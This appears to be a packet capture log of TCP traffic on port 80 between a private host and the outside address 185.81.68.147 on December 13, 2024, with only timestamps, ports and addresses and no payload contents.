                                                                                                                                                                                                Dec 13, 2024 08:18:55.270613909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.270750046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.270826101 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.271816015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.271899939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.271986008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.273019075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.273116112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.273214102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.274252892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.274302006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.274408102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.275474072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.275563955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.275638103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.276612997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.276711941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.276963949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.277797937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.277834892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.277915955 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.278995991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.279095888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.279166937 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.280201912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.280281067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.280345917 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.281384945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.281469107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.281548977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.282577038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.282660007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.282742977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.341378927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.386890888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.461024046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.461122990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.461240053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.461633921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.461648941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.461735964 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.462454081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.462563038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.462634087 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467035055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467047930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467140913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467174053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467194080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467231035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467238903 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467336893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.467410088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.468482971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.468638897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.468720913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.469918013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.469932079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.470031023 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.470962048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.470973969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.471071959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.471470118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.471482992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.471574068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.472028971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.472147942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.472220898 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.473207951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.473243952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.473311901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.474392891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.474473953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.474549055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.475579977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.475672960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.475748062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.476793051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.476861000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.476949930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.477957010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.478053093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.478143930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.479275942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.479290962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.479377031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.480396032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.480494976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.480611086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.481602907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.481720924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.481797934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.482754946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.482841015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.482914925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.483967066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.484069109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.484144926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.485169888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.485280991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.485353947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.486355066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.486438036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.486540079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.487627983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.487744093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.487818003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.488737106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.489325047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.489377975 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.489408970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.490513086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.490564108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.490565062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.491719007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.491791010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.491867065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.492942095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.492991924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.493043900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.494115114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.494183064 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.494236946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.495321035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.495398045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.495409012 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.496520042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.496675968 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.496717930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.497699022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.497761011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.497822046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.498892069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.498949051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.499036074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.500145912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.500190020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.500199080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.501286983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.501343966 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.501374006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.502578974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.502593994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.502635002 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.503773928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.503823042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.503835917 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.504968882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.505022049 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.505182028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.506103992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.506141901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.506151915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.507250071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.507306099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.507335901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.508445978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.508511066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.508546114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.509624004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.509680986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.509721994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.510876894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.510937929 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.511069059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.512025118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.512057066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.512145996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.513225079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.513278008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.513314009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.514391899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.514442921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.514503956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.515625000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.515702009 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.515753031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.516932011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.516987085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.517222881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.517996073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.518047094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.518085003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.519170046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.519227028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.519262075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.558876038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:55.580560923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.580575943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:55.580763102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.215703011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.215893030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.215945005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.215955973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.216073036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.216115952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.216658115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.216680050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.216721058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.217669964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.217730999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.217772007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.218921900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.218935966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.218993902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.220287085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.220345974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.220443010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.221127033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.221194029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.221236944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.222297907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.222419024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.222460985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.223500013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.223625898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.223663092 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.224714994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.224824905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.224917889 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.225868940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.225980997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.226062059 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.227101088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.227194071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.227250099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.228285074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.228396893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.228636980 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.229465008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.229577065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.230736017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.230746984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.230814934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.231877089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.231982946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.232023001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.233248949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.233261108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.233341932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.234225988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.234338045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.234417915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.235424042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.235526085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.235569954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.236629963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.236743927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.236784935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.237890005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.237900972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.237978935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.239015102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.239067078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.239140034 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.240355015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.240371943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.240416050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.241413116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.241523981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.241565943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.242609024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.242729902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.243789911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.243871927 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.243942976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.244997978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.245045900 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.245100021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.245138884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.246181965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.246315002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.246356010 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.247365952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.247472048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.247554064 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.248660088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.248672009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.248711109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.249778032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.249881983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.249929905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.251156092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.251168013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.251247883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:56.252152920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.252268076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:56.252351046 CET4972680192.168.2.11185.81.68.147
